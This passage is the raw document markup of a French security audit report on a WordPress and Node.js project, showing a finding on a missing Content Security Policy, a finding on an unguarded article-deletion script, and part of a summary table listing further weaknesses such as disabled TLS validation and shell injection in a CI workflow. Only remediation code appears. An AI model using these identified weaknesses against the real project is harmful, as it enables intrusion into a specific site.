              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-009  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Pas de Content Security Policy (CSP) configurée</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Informatif]</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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Informatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Headers HTTP de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wordpress/flashvoyage-widgets.php, Configuration WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP A05:2021, MDN CSP Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Aucune Content Security Policy n'est configurée dans le plugin WordPress. Compte tenu que le plugin injecte des scripts tiers (trpwdg.com, tp.media) et du JSON-LD dynamique dans le &lt;head&gt;, une CSP stricte est essentielle pour limiter l'impact d'une injection XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Absence de header dans le plugin :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// wp_add_inline_script, wp_localize_script ou add_action('send_headers') non utilisés pour CSP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ajouter une CSP via WordPress :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">add_action('send_headers', function() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    header("Content-Security-Policy: default-src 'self'; script-src 'self' https://trpwdg.com https://tp.media 'nonce-RANDOM'; style-src 'self' 'unsafe-inline'; frame-src https://trpwdg.com https://tp.media;");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-010  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Commandes shell dans des scripts Node.js déclenchables manuellement (delete-last-5-articles.js)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Informatif]</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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Informatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Opérations destructrices non protégées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">delete-last-5-articles.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Principle of Least Surprise, OWASP Security Design Principles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un script permettant de supprimer les 5 derniers articles WordPress publiés est présent dans le repository sans mécanisme de confirmation ni garde-fou (rate limiting, double confirmation, ou flag --confirm). Bien que les credentials soient nécessaires pour l'exécuter, sa présence dans un repository potentiellement public augmente le risque d'exécution accidentelle ou malveillante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// delete-last-5-articles.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">async function deleteLast5Articles() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  // Suppression directe sans confirmation interactive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ajouter une confirmation et un mode dry-run obligatoire :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if (!process.argv.includes('--confirm')) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  console.log('⚠️  Dry-run: pass --confirm to actually delete articles');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  process.exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Et ajouter ce script dans .gitignore ou le déplacer dans scripts/dangerous/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Tableau récapitulatif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1100"/>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="2100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3060"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Vulnérabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Désactivation de la validation TLS (rejectUnauthorized: false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E74C3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Haute</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cryptographie / Configuration réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">live-data-enricher.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Injection de commande shell via inputs non-assainis dans GitHub Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E74C3C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Haute</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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CI/CD — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">.github/workflows/generate-seo-pages.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Métadonnée REST API fv_schema_json exposée sans auth_callback sur les pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
